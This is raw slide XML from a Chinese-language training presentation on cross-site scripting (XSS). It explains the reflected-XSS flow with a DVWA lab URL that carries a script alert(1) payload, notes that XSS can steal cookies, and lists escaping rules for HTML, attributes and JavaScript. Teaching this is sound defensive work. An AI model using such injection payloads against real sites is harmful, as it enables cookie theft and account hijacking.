                <a:hlinkClick r:id="rId5" invalidUrl="http://mydvwa.com/dvwa/vulnerabilities/xss_r/?name=a&lt;script&gt;alert(1)&lt;/script&gt;"/>
              </a:rPr>
              <a:t>name=a%3Cscript%3Ealert%281%29%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发送给受害者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>受害者打开页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器解析了地址，然后返回给用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户收到有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>scirpt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>受害者浏览器根据</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16706419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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的检测与修复</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基本原理：就是通过给别人发送带有恶意脚本代码参数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址被打开时，特定的代码参数会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析，执行，如此就可以获取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>COOIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，进而盗号登陆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>检测与修复方式与存储行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类似。区别仅仅是不能存储到服务端。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="564747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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS(cross site script)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或者说跨站脚本是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序的漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意攻击者往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面里插入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码，当用户浏览该页之时，嵌入其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码会被执行，从而达到恶意攻击用户的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652017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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用流程</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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32" y="1412776"/>
            <a:ext cx="1152128" cy="1152128"/>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688" y="4309425"/>
            <a:ext cx="1349716" cy="111947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1984" y="4259560"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="燕尾形箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="983432" y="3068960"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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提供链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圆角矩形标注 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7680176" y="3212976"/>
            <a:ext cx="1440160" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61551"/>
              <a:gd name="adj2" fmla="val 41796"/>
              <a:gd name="adj3" fmla="val 16667"/>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服务器解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>接收内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>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32" y="4221088"/>
            <a:ext cx="1152128" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="燕尾形箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135560" y="4509120"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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点击链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="燕尾形箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4727848" y="4941168"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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smtClean="0"/>
              <a:t>点击链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="燕尾形箭头 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4637404" y="4305267"/>
            <a:ext cx="1208693" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="64C1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sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>返回数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="699935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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器解析顺序：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器解码顺序：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18255628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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一是对用户输入的特殊字符进行转译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中不可信字符串进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>amp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>"	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA" altLang="zh-CN" dirty="0"/>
              <a:t>`	&amp;#x60;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>'	&amp;#x27;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>/	&amp;#x2F;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性中不可信字符串进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，并且总是为你的属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>‘ 或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符，用格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者命名实体，如果可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字符以防止开关的值伸出属性。恰当的为属性加上引号可以只被对应的引号转义。不带引号的属性可以被分解为许多个字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包括和。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1265243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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（续）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>事件触发属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的不可信字符串，先进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，因为浏览器在执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串解码前执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性解码。对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的非可信数据，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串转义并且总是将属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符，以格式转义小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的所有字符，以防开关的值伸到脚本中或另一个属性。不要使用类似的转义符号，因为引号符号可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性解析器在第一次运行被匹配。这些转义字符也容易受到”转义已转义”的攻击，攻击者发送和漏洞代码转为使得可以成为引号。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>事件触发属性</a:t>
